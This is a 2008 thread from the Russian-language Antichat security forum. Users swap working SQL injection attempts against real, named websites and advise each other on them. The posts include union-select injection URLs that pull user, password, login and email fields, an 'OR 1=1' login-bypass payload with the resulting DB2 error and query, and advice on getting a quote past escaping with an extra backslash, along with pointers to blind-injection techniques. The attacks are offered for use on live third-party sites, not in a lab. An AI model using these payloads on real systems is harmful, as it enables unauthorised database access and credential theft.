ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.08.2008, 22:46
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от n0ne
Велемир, они могут быть пустыми
Эм...При проверке на NULL взял поле,которое возвращает значение.is+null - не высвечивается ничего.is+not+null - высвечивается содержимое поля,тобишь,если не ноль, данные выводятся,а если ноль - нет?Или писаться NULL должно ? Просто результаты что с *якобы* пустым полем, и с полем со значением - одинаковые.
|
|
|
06.08.2008, 08:00
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Велемир, я плохой телепат. Напиши полностью запросы которые ты проводишь и ответы на них. Извини, но пишешь ты непонятно)
|
|
|
|
06.08.2008, 12:12
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.rtr.spb.ru/People_line/viewmsg.asp?ID=-17775+union+select+1,2,3,4,user,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21+where+user+is+not+null--&FID=17452
Не ноль - выводит данные.
http://www.rtr.spb.ru/People_line/viewmsg.asp?ID=-17775+union+select+1,2,3,4,user,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21+where+user+is+null--&FID=17452
Ноль - не выводит).Так получается ?
Последний раз редактировалось Велемир; 06.08.2008 в 12:26..
|
|
|
|
06.08.2008, 12:38
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Велемир
Ты конечно величайший экспериментатор современности, но тебе самому не надоело , что 90% твоих постов просто никто не понимает, а 70% удаляют модераторы?
Прочитай хоть одну книгу по интересующей тебя теме, и все твои вопросы отпадут.
По поводу последнего поста вот онлайн справочник по базам данных:
http://www.sql.ru/docs/
Умоляю тебя, прочитай хоть что-нибудь!!!
|
|
|
|
06.08.2008, 14:19
|
|
Новичок
Регистрация: 26.11.2007
Сообщений: 6
Провел на форуме:
80047
Репутация:
5
|
|
нашел вот такой сайт
Код:
http://www.elementar.de/cms/index.php?id=487&L=-1231314+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95/*
попробовал подставить version() в каждое из 95 полей  , как вообще лучше искать то поле (если их например больше 50) куда подставлять нужный код? |
|
|
|
06.08.2008, 16:49
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Buddah, твой пример - слепая инъекция. Слепая, потому что нет вывода. Что бы прочитать какие-то данные из базы используют подзапросы и побуквенно вытаскивают инфу. Почитай это:
1) http://dev.mysql.com/doc/
2) https://forum.antichat.ru/thread19605.html
3) https://forum.antichat.ru/thread35207.html
А по поводу того как лучше искать поле и всё прочее - поле должно иметь вывод на страницу, тебе же надо увидеть какие-то данные?  |
|
|
|
06.08.2008, 16:54
|
|
Новичок
Регистрация: 25.09.2005
Сообщений: 29
Провел на форуме:
104355
Репутация:
9
|
|
есть сайт http://site.com/index.php
на котором можно залогинится.
я посылаю следующий POST запрос
Код:
login=admin'+OR+1=1&password=qwerty
выдает следующую ошибку
Код:
[IBM][CLI Driver][DB2/LINUX] SQL0010N The string constant beginning with "'" does not have an ending string delimiter. SQLSTATE=42603 Attempted Query: select c.id,login,password,user_name,org_name,dt_of_birth,rtrim(who_is) as WHO_IS,"plan",last_login,last_updated,ip_addr,street,city,country,zip,phone,icq,email,dish_size,expired,dealer,manager,status,c.transponder as transponder,card_type,os_type,c.kind,acl,p.pid as pid,bgp_as,bgp_peer,mac_addr,can_chng_plan,can_pay,prize_percent,prize_id,mobile,rtrim(type_conn) as type_conn from clients as c left join plans as p on c."plan"=p.id where login='admin\\\' OR 1=1'
из ошибки видно что добавляются слеши и я думаю что изза них и не пропускает...
кто что может посоветовать ??? |
|
|
|
06.08.2008, 17:32
|
|
Новичок
Регистрация: 26.11.2007
Сообщений: 6
Провел на форуме:
80047
Репутация:
5
|
|
Сообщение от n0ne
Buddah, твой пример - слепая инъекция. Слепая, потому что нет вывода. Что бы прочитать какие-то данные из базы используют подзапросы и побуквенно вытаскивают инфу. Почитай это:
1) http://dev.mysql.com/doc/
2) https://forum.antichat.ru/thread19605.html
3) https://forum.antichat.ru/thread35207.html
А по поводу того как лучше искать поле и всё прочее - поле должно иметь вывод на страницу, тебе же надо увидеть какие-то данные? спасибо пошел читать
|
|
|
|
06.08.2008, 22:42
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от muse
выдает следующую ошибку
Код:
[IBM][CLI Driver][DB2/LINUX] SQL0010N The string constant beginning with "'" does not have an ending string delimiter. SQLSTATE=42603 Attempted Query: select c.id,login,password,user_name,org_name,dt_of_birth,rtrim(who_is) as WHO_IS,"plan",last_login,last_updated,ip_addr,street,city,country,zip,phone,icq,email,dish_size,expired,dealer,manager,status,c.transponder as transponder,card_type,os_type,c.kind,acl,p.pid as pid,bgp_as,bgp_peer,mac_addr,can_chng_plan,can_pay,prize_percent,prize_id,mobile,rtrim(type_conn) as type_conn from clients as c left join plans as p on c."plan"=p.id where login='admin\\\' OR 1=1'
из ошибки видно что добавляются слеши и я думаю что изза них и не пропускает...
кто что может посоветовать ??? Скорее всего ты здесь ничего не сделаешь, т.к. судя по всему мейджик_квотс = он:
Думаю что вначале кавычка экранировалась слешем (который ставился квотой), а затем сам скрипт экранировал повторно и кавычку и слеш (поставленный квотой), т.е. скорее всего даже если мейджик_квотс был равен = офф, ты бы здесь ничего не сделал.
А вообще в таких случая нужно приписывать перед кавычкой слеш (в надежде что мейджик_квотс = офф и что скриптом слеш не будет экранирован), тогда получится что один слеш экранирует другой, а кавычка останется не экранированной ( \\' ).
Последний раз редактировалось Grey; 06.08.2008 в 22:45..
|
|
|
|
06.08.2008, 22:48
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
привет.
ребята, помогите мне пожалуйста вот с етим:
http://alvis.ru/company_news/index.php3?id=-1+union+select+1,2,3,concat_ws(char(58),pwd,login, email),5,6,7,8,9,10,11,12,13,14+from+users/*
а дальше че-т не идет..
через SICT перебрал таблици, вроде есть admin, но доступа у меня к ней нету =(
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
